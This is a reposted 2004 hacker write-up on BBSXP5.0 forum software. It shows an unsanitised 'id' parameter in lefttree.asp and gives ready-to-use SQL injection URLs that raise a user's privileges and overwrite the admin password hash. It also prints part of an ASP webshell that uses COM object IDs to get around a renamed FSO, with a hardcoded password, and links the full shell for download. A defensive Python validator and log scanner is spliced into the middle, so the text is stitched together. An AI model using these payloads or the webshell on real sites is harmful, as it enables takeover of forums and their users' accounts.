
[Repost] Shape-Shifting: BBSXP5.0

Source: 情感联盟
Authors: xiaolu & 13K

===========================[ Shape-Shifting: BBSXP5.0 ]==================
Vulnerability discoverers: xiaolu(web@666w.cn) 13K(13_k@163.com)
Affected versions: BBSXP5.0 SQL/ACCESS
Date: 2004.5.1 WWW.666W.COM WWW.SHJSAFE.COM
==============[ 1. Preface ]============================================

-_-"" Today is the May 1st Labour Day holiday, so bored.. First of all, happy Labour Day everyone.....

Too bored.. I was posting on a friend's forum, and he asked me to check his forum's security.....

Alright, I took a look: it runs BBSXP5.0. So I went and downloaded a copy to look at....

======================================[ 2. Content ]====================

Reading through the code..........

(I never expected a problem this **. Programmers should do some self-reflection. There is nothing technical about this article; I only want to remind programmers not to be so lazy
Code: lefttree.asp (excerpt)
<!-- #include file="setup.asp" -->
<%

if Request("menu")="menu" then

' Request("id") is concatenated straight into the SQL text with no type check or escaping
sql="Select * From menu where followid="&Request("id")&" order by SortNum"
Set Rs1=Conn.Execute(sql)
do while not rs1.eof
Heh heh. See it? How utterly careless.........
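As an added example that is not from the original post: the strict integer check lefttree.asp should have applied to `id` before building the query, plus the same check run over constructed IIS W3C log lines to find requests that smuggle a stacked statement into `id`. The log field order, the IP addresses and the `HASH` placeholder are assumptions.

```python
import re
from urllib.parse import unquote_plus

# followid is an integer column, so the only acceptable value for id is a bare
# run of decimal digits: no sign, no whitespace, no ';' and no '--' can pass.
ID_PATTERN = re.compile(r"^\d{1,9}$")


def is_safe_id(value):
    """Return True only for a plain decimal integer string; everything else is rejected."""
    return bool(ID_PATTERN.match(value))


def parse_query(query):
    """Split cs-uri-query on '&' only (IIS logs it raw) and percent-decode each name and value."""
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


# Constructed IIS W3C log lines (not from the original post); assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2004-05-01 10:00:01 10.0.0.5 GET /LeftTree.asp menu=menu&id=1 200
2004-05-01 10:00:07 10.0.0.5 GET /LeftTree.asp menu=menu&id=2 200
2004-05-01 10:01:12 10.0.0.9 GET /LeftTree.asp menu=menu&id=1;update+[user]+set+membercode=5+where+username='x'-- 200
2004-05-01 10:01:30 10.0.0.9 GET /LeftTree.asp menu=menu&id=1%3Bupdate+clubconfig+set+adminpassword%3D'HASH'-- 200
2004-05-01 10:02:00 10.0.0.7 GET /index.asp - 200
"""


def scan_iis_log(text):
    """Return (client_ip, decoded_id) for every LeftTree.asp hit whose id is not a plain integer."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        c_ip, stem, query = fields[2], fields[4], fields[5]
        if stem.lower() != "/lefttree.asp" or query == "-":
            continue
        for decoded in parse_query(query).get("id", []):
            if not is_safe_id(decoded):
                findings.append((c_ip, decoded))
    return findings
```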

=======================[ 3. Exploitation ]===================================

OK. Let's go..
Code:
http://www.host.com/LeftTree.asp?menu=menu&id=1;update [user] set membercode=5 where username='fuck'--
http://www.host.net/LeftTree.asp?menu=menu&id=1;update clubconfig set adminpassword='A64D84237507262182B4B902A5EDC35B'--
OK.
user:fuck
pass:xiaoxue

"A64D84237507262182B4B902A5EDC35B" is a 32-character MD5 hash.

Into the admin panel.. heh heh. Let's put up a webshell.. upload it.... argh!!!!! FSO has been renamed.. sob sob

No fun.. have to find a way around it....OK. Got it!

Use object, wahaha..... done, done........

Tried it: they didn't change the clsid. As long as the clsid is unchanged it will run... code as follows:
Code:
<%@ LANGUAGE = VBscript.Encode codepage ="936" %>
<%Server.scriptTimeOut=5000%>
<object runat=server id=oscript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oscriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
'on error resume next
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("script_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="fuckfuck" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>

<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>

<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>
The rest is omitted......

The full code can be downloaded from:
http://soft.666w.com/tools/gif.rar

Heh.... problem solved, and we can carry on from here.......

=======================[ 4. Conclusion ]===================================

These can be used to obtain higher privileges, heh heh.. On the ACCESS version you can only get the MD5-hashed Password..
OK... all done.. back to being bored.... 路子, let's go, we two brothers are off drinking to kill the boredom......GO GO GO
qq310926 is the only QQ number I use; anyone using another number and claiming to be 邪八冰血封情 is not me.
